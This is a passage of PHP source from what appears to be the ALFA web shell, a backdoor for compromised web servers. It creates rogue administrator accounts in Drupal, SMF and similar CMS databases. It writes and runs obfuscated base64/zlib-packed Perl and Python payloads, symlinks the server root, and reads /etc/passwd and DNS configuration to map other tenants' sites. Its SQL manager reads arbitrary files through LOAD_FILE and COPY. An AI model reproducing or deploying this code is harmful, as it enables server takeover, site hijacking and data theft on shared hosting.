     array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id' => 'db_prefix','inputName' => 'prefix', 'inputValue' => '', 'inputSize' => '50'),
     'td6' =>
     array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
     'td7' =>
     array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),
     'td8' =>
     array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50')
    );
    create_table($table);
    echo '
';
    if ($_POST['alfa1'] && $_POST['alfa1'] == '>>') {
      $localhost = $_POST['alfa2'];
      $database = $_POST['alfa3'];
      $username = $_POST['alfa4'];
      $password = $_POST['alfa5'];
      $admin = $_POST['alfa7'];
      $SQL = $_POST['alfa9'];
      $prefix = $_POST['alfa10'];
      $conn = @mysqli_connect($localhost, $username, $password, $database) or die(mysqli_error($conn));
      $hash = md5($pwd);
      $solevisible = @mysqli_query($conn, "insert into ".$prefix."_authors(aid,name,email,pwd) values('$admin','God','$SQL','d4a590caacc0be55ef286e40a945ea45')") or die(mysqli_error($conn));
      if ($solevisible) {
        __alert('Success... '.$admin.' is created...');
      }
    }
  }
  if (isset($_POST['alfa9']) && $_POST['alfa9'] == 'drupal') {

    echo __pre().'
| Drupal |
'.getConfigHtml('drupal').'
';
    $table = array('td1' =>
     array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id' => 'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
     'td2' =>
     array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id' => 'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
     'td3' =>
     array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id' => 'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
     'td4' =>
     array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id' => 'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
     'td6' =>
     array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
     'td7' =>
     array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true)
     );
    create_table($table);
    echo '
';
    if ($_POST['alfa1'] && $_POST['alfa1'] == '>>') {
      $localhost = $_POST['alfa2'];
      $database = $_POST['alfa4'];
      $username = $_POST['alfa5'];
      $password = $_POST['alfa6'];
      $admin = $_POST['alfa8'];
      $conn = @mysqli_connect($localhost, $username, $password, $database) or die(mysqli_error($conn));
      $getDescuid = @mysqli_query($conn, "select uid from users order by uid desc limit 0,1");
      $getDescuid = @mysqli_fetch_assoc($getDescuid);
      $getDescuid = $getDescuid['uid'];
      $getdescuid = $getDescuid++;
      $solevisible = @mysqli_query($conn, "insert into users (uid,name,pass,mail,signature_format,status,timezone,init) values('$getDescuid','$admin','\$S\$DP2y9AbolCBOd\/WyQcpzu4zF57qE0noyCNeXZWv.37R66VsFjOiC','solevisible@fbi.gov','filtered_html','1','Europe/Berlin','solevisible@fbi.gov')") or die(mysqli_error($conn));
      $solevisible = @mysqli_query($conn, "select uid from users where name='".$admin."'") or die(mysqli_error($conn));
      $sole = mysqli_num_rows($solevisible);
      if ($sole == 1) {
        $solevis = mysqli_fetch_assoc($solevisible);
        $res = $solevis['uid'];
      }
      $solevisible = @mysqli_query($conn, "INSERT INTO users_roles (uid,rid) VALUES ('".$res."', '3')") or die(mysqli_error($conn));
      if ($solevisible) {
        __alert('Success... '.$admin.' is created...');
      }
    }
  }

  if (isset($_POST['alfa10']) && $_POST['alfa10'] == 'smf') {

    echo __pre().'
| SMF |
'.getConfigHtml('smf').'
';
    $table = array('td1' =>
     array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id' => 'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
     'td2' =>
     array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id' => 'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
     'td3' =>
     array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id' => 'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
     'td4' =>
     array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id' => 'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
     'td5' =>
     array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id' => 'db_prefix','inputName' => 'prefix', 'inputValue' => 'smf_', 'inputSize' => '50'),
     'td6' =>
     array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
     'td7' =>
     array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'hi', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),
     );
    create_table($table);
    echo '
';
    if ($_POST['alfa1'] && $_POST['alfa1'] == '>>') {
      $localhost = $_POST['alfa2'];
      $database = $_POST['alfa3'];
      $username = $_POST['alfa5'];
      $password = $_POST['alfa6'];
      $prefix = $_POST['alfa7'];
      $admin = $_POST['alfa8'];
      $conn = @mysqli_connect($localhost, $username, $password, $database) or die(mysqli_error($conn));
      $setpwAlg = sha1(strtolower($admin) . 'solevisible');
      $solevisible = @mysqli_query($conn, "insert into {$prefix}members (id_member,member_name,id_group,real_name,passwd,email_address) values(null,'$admin','1','$admin','$setpwAlg','solevisible@fbi.gov')") or die(mysqli_error($conn));
      if ($solevisible) {
        __alert('Success... '.$admin.' is created...');
      }
    }
  }
  echo "
";
  alfafooter();
}
function alfaMakePwd() {
  if (_alfa_file_exists("/etc/virtual/domainowners") || (_alfa_file_exists("/etc/named.conf") && _alfa_file_exists("/etc/valiases"))) {
    return "/home/{user}/public_html/";
  }
  $document = explode("/", $_SERVER["DOCUMENT_ROOT"]);
  $public = end($document);
  array_pop($document);
  array_pop($document);
  $path = implode("/", $document) . "/{user}/" . $public;
  return $path;
}
function alfaGetDomains($state = false) {
  $state = "named.conf";
  $lines = array();
  $lines = _alfa_file('/etc/named.conf');
  if (!$lines) {
    $lines = @scandir("/etc/valiases/");
    $state = "valiases";
    if (!$lines) {
      $lines = @scandir("/var/named");
      $state = "named";
      if (!$lines && $state) {
        $lines = _alfa_file('/etc/passwd');
        $state = "passwd";
      }
    }
  }
  return array("lines" => $lines, "state" => $state);
}
function alfaCreateParentFolder() {
  $parent = $GLOBALS['home_cwd'] . "/" . __ALFA_DATA_FOLDER__;
  if (!@is_dir($parent)) {
    @mkdir($parent, 0755, true);
  }
}
function alfasymlink() {
  alfahead();
  AlfaNum(9, 10);
  alfaCreateParentFolder();
  @chdir($GLOBALS['home_cwd'] . "/" . __ALFA_DATA_FOLDER__);
  echo '

| Symlink |
| Symlink( php ) | | Symlink( perl ) | | Symlink( python ) | | File Symlink | 
';
  if (isset($_POST['alfa2']) && ($_POST['alfa2'] == 'symperl' || $_POST["alfa2"] == "sympy")) {
    $sympath = alfaMakePwd();
    @mkdir('cgialfa', 0755);
    @chdir('cgialfa');
    alfacgihtaccess('cgi');
    $perl = '#!/usr/bin/perl   -I/usr/local/bandmin'."\n".'use MIME::Base64;use Compress::Zlib;my $alfa_data="'.__ALFA_DATA_FOLDER__.'";eval(Compress::Zlib::memGunzip(decode_base64("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")));';
    $py = '#!/usr/bin/python'."\nimport zlib, base64\nalfa_data='".__ALFA_DATA_FOLDER__."'\n".'eval(compile(zlib.decompress(base64.b64decode("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")),\'\',\'exec\'))';
    $cginame = "symperl.alfa";
    $source = $perl;
    $lang = "perl";
    if ($_POST["alfa2"] == "sympy") {
      $cginame = "pysymlink.alfa";
      $source = $py;
      $lang = "python";
    }
    @__write_file($cginame, $source);
    @chmod($cginame, 0755);
    echo __pre();
    $resource = alfaEx("{$lang} {$cginame} {$sympath}", false, true, true);
    if (strlen($resource) == 0) {
      echo AlfaiFrameCreator('cgialfa/'.$cginame);
    } else {
      echo $resource;
    }
  }
  if (isset($_POST['alfa4']) && $_POST['alfa4'] == 'SymFile') {
    if (function_exists('symlink') || _alfa_can_runCommand(true, true)) {
      AlfaNum(9, 10);
      echo __pre().'

| Symlink File And Directory |





';
      $path = $_POST['alfa5'];
      $symname = $_POST['alfa6'];
      $solevisible58 = $_POST['alfa7'];
      if ($solevisible58) {
        $new_name = str_replace(".", "_", basename($symname));
        $rand_dir = $new_name.rand(111, 9999);
        $sym_dir = 'alfasymlinkphp/'.$rand_dir.'/';
        @mkdir($sym_dir, 0777, true);
        alfacgihtaccess('sym', $sym_dir, $symname);
        _alfa_symlink("$path", "$sym_dir/$symname");
        echo __pre();
        echo '
Click >> '.$symname.'
';
      }
    } else {
      echo "
[+] Symlink Function Disabled !
";
    }
  }
  if (isset($_POST['alfa2']) && $_POST['alfa2'] == 'symphp') {
    $cant_symlink = true;
    if (function_exists('symlink') || _alfa_can_runCommand(false, false)) {
      @mkdir('alfasymlink', 0777);
      alfacgihtaccess('sym', 'alfasymlink/');
      _alfa_symlink('/', 'alfasymlink/root');
      $table_header = "

";
      if (_alfa_file_exists("/etc/named.conf") && !_alfa_file_exists("/etc/virtual/domainowners") && _alfa_file_exists("/etc/valiases/")) {
        echo "
";
        $lines = array();
        $anony_domains = array();
        $anonymous_users = array();
        $f_black = array();
        $error = false;
        $anonymous = false;
        $makepwd = "/home/{user}/public_html/";
        $domains = alfaGetDomains();
        $lines = $domains["lines"];
        $state = $domains["state"];
        $is_posix = function_exists("posix_getpwuid") && function_exists("fileowner");
        $can_runcmd = _alfa_can_runCommand(false, false);
        if (!$is_posix && !$can_runcmd) {
          $anonymous = true;
          $anony_domains = $domains["lines"];
          $lines = _alfa_file('/etc/passwd');
        }
        echo $table_header;
        $count = 1;
        $template = '
';
        foreach ($lines as $line) {
          $domain = "";
          $owner = "";
          if ($anonymous) {
            $explode = explode(":", $line);
            $owner = $explode[0];
            $owner_len = strlen($owner) - 1;
            $userid = $explode[2];
            if ((int)$userid < 500) {
              continue;
            }
            $domain = "[?????]";
            $temp_black = array();
            $finded = false;
            foreach ($anony_domains as $anony) {
              if ($state == "named.conf") {
                if (@strstr($anony, 'zone')) {
                  preg_match_all('#zone "(.*)"#', $anony, $data);
                  $domain = $data[1][0];
                } else {
                  continue;
                }
              } elseif ($state == "named" || $state == "valiases") {
                if ($anony == "." || $anony == "..") {
                  continue;
                }
                if ($state == "named") {
                  $anony = rtrim($anony, ".db");
                }
                $domain = $anony;
              }
              $sub_domain = str_replace(array("-","."), "", $domain);
              if (substr($owner, 0, $owner_len) == substr($sub_domain, 0, $owner_len)) {
                if (in_array($owner.$domain, $temp_black)) {
                  continue;
                }
                $sympath = str_replace("{user}", $owner, $makepwd);
                $http = "http://".$domain;
                echo str_replace(array("{count}", "{http}", "{domain}", "{owner}", "{sympath}"), array($count, $http, $domain, $owner, $sympath), $template);
                $count++;
                $temp_black[] = $owner.$domain;
                $finded = true;
              }
            }
            if (!$finded) {
              $anonymous_users[] = $owner;
            }
          } else {
            if ($state == "named.conf") {
              if (@strstr($line, 'zone')) {
                preg_match_all('#zone "(.*)"#', $line, $data);
                $domain = $data[1][0];
              } else {
                continue;
              }
            } elseif ($state == "named" || $state == "valiases") {
              if ($line == "." || $line == "..") {
                continue;
              }
              if ($state == "named") {
                $line = rtrim($line, ".db");
              }
              $domain = $line;
            }
            if (strlen(trim($domain)) > 2 && $state != "passwd") {
              if (!_alfa_file_exists('/etc/valiases/'.$domain, false)) {
                continue;
              }
              if ($is_posix) {
                $user = @posix_getpwuid(@fileowner('/etc/valiases/'.$domain));
                $owner = $user["name"];
              } elseif ($can_runcmd) {
                $owner = alfaEx("stat -c '%U' /etc/valiases/".$domain, false, false);
              }
            }
          }
          if (!$anonymous) {
            if (strlen($owner) == 0 || in_array($owner.$domain, $f_black)) {
              continue;
            }
            $sympath = str_replace("{user}", $owner, $makepwd);
            $http = "http://".$domain;
            if ($state == "passwd") {
              $http = "javascript:alert('we cant find domain...')";
            }
            echo str_replace(array("{count}", "{http}", "{domain}", "{owner}", "{sympath}"), array($count, $http, $domain, $owner, $sympath), $template);
            $count++;
            $f_black[] = $owner.$domain;
          }
        }
        if ($anonymous) {
          foreach ($anonymous_users as $owner) {
            $sympath = str_replace("{user}", $owner, $makepwd);
            $http = "javascript:alert('we cant find domain...')";
            echo str_replace(array("{count}", "{http}", "{domain}", "{owner}", "{sympath}"), array($count, $http, "[????]", $owner, $sympath), $template);
            $count++;
          }
        }
        $cant_symlink = false;
      } else {
        $is_direct = false;
        $makepwd = alfaMakePwd();
        if (_alfa_file_exists("/etc/virtual/domainowners")) {
          $makepwd = "/home/{user}/public_html";
          $is_direct = true;
        }
        $sole = _alfa_file("/etc/virtual/domainowners");
        $count = 1;
        echo $table_header;
        $template = '';
        if ($sole) {
          foreach ($sole as $visible) {
            if (@strstr($visible, ":")) {
              $solevisible = explode(':', $visible);
              $cwd = str_replace("{user}", trim($solevisible[1]), $makepwd);
              echo str_replace(array("{count}","{user}","{url}","{cwd}"), array($count++, trim($solevisible[1]), trim($solevisible[0]), $cwd), $template);
            }
          }
        } else {
          $passwd = _alfa_file("/etc/passwd");
          if ($passwd) {
            $html = "";
            $is_named = false;
            $users = array();
            $domains = array();
            $uknowns = array();
            foreach ($passwd as $user) {
              $user = trim($user);
              $expl = explode(":", $user);
              if ((int)$expl[2] < 500) {
                continue;
              }
              $users[$expl[0]] = $expl[5];
            }
            $site_domains = @scandir("/etc/virtual/");
            if (!$site_domains) {
              $site_domains = alfaEx("ls /etc/virtual/");
              $site_domains = explode("\n", $site_domains);
              if (!$site_domains) {
                $site_domains = _alfa_file("/etc/named.conf");
                if ($site_domains) {
                  $is_named = true;
                }
              }
            }
            foreach ($site_domains as $line) {
              if ($is_named) {
                if (@strstr($line, 'zone')) {
                  preg_match_all('#zone "(.*)"#', $line, $data);
                  $domain = $data[1][0];
                  if (strlen($domain  > 2) && !empty($domain)) {
                    $domains[] = $domain;
                  }
                }
              } else {
                $domains[] = $line;
              }
            }
            $x = 1;
            foreach ($users as $user => $home) {
              foreach ($domains as $domain) {
                $user_len = strlen($user) - 1;
                $sub_domain = str_replace(array("-","."), "", $domain);
                $five_user = substr($user, 0, $user_len);
                $five_domain = substr($sub_domain, 0, $user_len);
                if ($five_user == $five_domain) {
                  if ($is_direct) {
                    $cwd = str_replace("{user}", $user, $makepwd);
                  } else {
                    $expl = explode("}/", $makepwd);
                    $cwd = $home."/".$expl[1];
                  }
                  $html .= str_replace(array("{count}","{user}","{url}", "{cwd}"), array($x++, $user, $domain, $cwd), $template);
                } else {
                  $uknowns[$user] = $home;
                }
              }
            }
            $uknowns = array_unique($uknowns);
            foreach ($uknowns as $user => $home) {
              if ($is_direct) {
                $cwd = str_replace("{user}", $user, $makepwd);
              } else {
                $expl = explode("}/", $makepwd);
                $cwd = $home."/".$expl[1];
              }
              $html .= str_replace(array("{count}","{user}","{url}", "{cwd}"), array($x++, $user, "[?????]", $cwd), $template);
            }
            echo($html);
          }
        }
        echo "
*DomainsUserssymlink
{count}{domain} {owner}Symlink
{count}{url} {user}Symlink
";
        $cant_symlink = false;
      }
    } else {
      echo "
[+] Symlink Function Disabled !
";
      $cant_symlink = false;
    }
    if ($cant_symlink) {
      echo '

Error...
';
    }
    echo "
"; } echo "
"; alfafooter(); } function alfasql() { class DbClass { public $type; public $link; public $res; public $mysqli_connect_error = false; public $mysqli_connect_error_msg = ""; public function __construct($type) { $this->type = $type; } public function connect($host, $user, $pass, $dbname) { switch ($this->type) { case 'mysql': if ($this->link = @mysqli_connect($host, $user, $pass, $dbname)) { return true; } else { $this->mysqli_connect_error = true; $this->mysqli_connect_error_msg = mysqli_connect_error(); return false; } break; case 'pgsql': $host = explode(':', $host); if (!$host[1]) { $host[1] = 5432; } if ($this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname")) { return true; } break; } return false; } public function selectdb($db) { switch ($this->type) { case 'mysql': if (@mysqli_select_db($db)) { return true; } break; } return false; } public function query($str) { switch ($this->type) { case 'mysql': return $this->res = @mysqli_query($this->link, $str); break; case 'pgsql': return $this->res = @pg_query($this->link, $str); break; } return false; } public function fetch() { $res = func_num_args() ? func_get_arg(0) : $this->res; switch ($this->type) { case 'mysql': return @mysqli_fetch_assoc($res); break; case 'pgsql': return @pg_fetch_assoc($res); break; } return false; } public function listDbs() { switch ($this->type) { case 'mysql': return $this->query("SHOW databases"); break; case 'pgsql': return $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!='t'"); break; } return false; } public function listTables() { switch ($this->type) { case 'mysql': return $this->res = $this->query('SHOW TABLES'); break; case 'pgsql': return $this->res = $this->query("select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'"); break; } return false; } public function error() { switch ($this->type) { case 'mysql': return @mysqli_error($this->link); break; case 'pgsql': return @pg_last_error(); break; } return false; } public function setCharset($str) { switch ($this->type) { case 'mysql': if (function_exists('mysql_set_charset')) { return @mysqli_set_charset($this->link, $str); } else { $this->query('SET CHARSET '.$str); } break; case 'pgsql': return @pg_set_client_encoding($this->link, $str); break; } return false; } public function loadFile($str) { switch ($this->type) { case 'mysql': return $this->fetch($this->query("SELECT LOAD_FILE('".addslashes($str)."') as file")); break; case 'pgsql': $this->query("CREATE TABLE solevisible(file text);COPY solevisible FROM '".addslashes($str)."';select file from solevisible;"); $r = array(); while ($i = $this->fetch()) { $r[] = $i['file']; } $this->query('drop table solevisible'); return array('file' => implode("\n", $r)); break; } return false; } }; $db = new DbClass($_POST['type']); alfahead(); $form_visibility = "table"; if (isset($_POST['sql_host'])) { $connection_db = $db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']); if ($connection_db && !empty($_POST['sql_base'])) { $form_visibility = "none"; } } $database_list = array(); echo "
".($form_visibility != "none" ? "
| Sql Manager |

".getConfigHtml('all')."

" : "")."
TYPE
HOST
DB USER
DB PASS
DB NAME
"; $tmp = ""; if (isset($_POST['sql_host'])) { if ($connection_db) { $db->setCharset('utf8'); $db->listDbs(); echo "'; } else { echo $tmp; } } else { echo $tmp; } $curr_mysql_id = $_POST['current_mysql_id']; echo "
count the number of rows
"; if ($db->mysqli_connect_error) { echo '
'.$db->mysqli_connect_error_msg.'
'; } if (!empty($curr_mysql_id)) { $sql_title_db = ""; if (!empty($_POST['sql_base'])) { $sql_title_db = "d.querySelector('#tab_".$curr_mysql_id." span').innerHTML='".addslashes($_POST['sql_base'])."';"; } echo ""; } if (isset($db) && $db->link) { if (!empty($_POST['sql_base'])) { echo "
<<
Expand/Collapse All DataBases
    "; foreach ($database_list as $db_name) { echo '
  • Expand/Collapse
    '.$db_name.'
    '; if ($db_name == $_POST['sql_base']) { $db->selectdb($_POST['sql_base']); $tbls_res = $db->listTables(); echo '
      • '; while ($item = $db->fetch($tbls_res)) { list($key, $value) = each($item); if (!empty($_POST['sql_count'])) { $n = $db->fetch($db->query('SELECT COUNT(*) as n FROM `'.$value.'`')); } $value = htmlspecialchars($value); echo "
    •  ".$value."" . (empty($_POST['sql_count']) ? ' ' : " ({$n['n']})") . "
      • "; } echo '
    '; } echo "
    • "; } echo "
Result
Query
Search
Structure
Insert
Query:

"; } echo "
"; echo "
"; } else { echo htmlspecialchars($db->error()); } echo '
